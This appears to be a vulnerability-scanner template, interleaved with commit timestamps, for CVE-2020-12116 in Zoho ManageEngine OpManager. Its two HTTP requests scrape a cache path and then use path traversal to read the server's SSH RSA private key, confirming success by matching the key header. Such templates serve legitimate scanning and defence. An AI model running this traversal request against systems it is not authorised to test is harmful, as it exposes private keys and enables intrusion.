2021-01-02 04:56:15 +00:00
id : CVE-2020-12116
2020-10-01 06:55:32 +00:00
info :
2022-05-09 16:12:52 +00:00
name : Zoho ManageEngine OpManger - Arbitrary File Read
2020-10-01 06:55:32 +00:00
author : dwisiswant0
severity : high
2022-04-07 13:53:15 +00:00
description : Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
reference :
- https://github.com/BeetleChunks/CVE-2020-12116
- https://nvd.nist.gov/vuln/detail/CVE-2020-12116
- https://www.manageengine.com/network-monitoring/help/read-me-complete.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-12116
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
epss-score : 0.97327
2022-04-07 13:53:15 +00:00
tags : cve,cve2020,zoho,lfi,manageengine
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2020-10-01 06:55:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-10-01 06:55:32 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
Accept : */*
Connection : close
- |
2022-04-07 13:53:15 +00:00
GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
2020-10-01 06:55:32 +00:00
Host : {{Hostname}}
Accept : */*
Cache-Control : max-age=0
Connection : close
Referer : http://{{Hostname}}
extractors :
- type : regex
name : endpoint
part : body
internal : true
regex :
- "(?m)/cachestart/.*/jquery/"
2021-06-29 21:56:01 +00:00
req-condition : true
2020-10-01 06:55:32 +00:00
matchers :
2021-06-29 21:56:01 +00:00
- type : dsl
dsl :
- 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
- 'status_code_2 == 200'
2022-01-04 19:34:16 +00:00
condition : and
2022-04-07 13:53:15 +00:00
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/04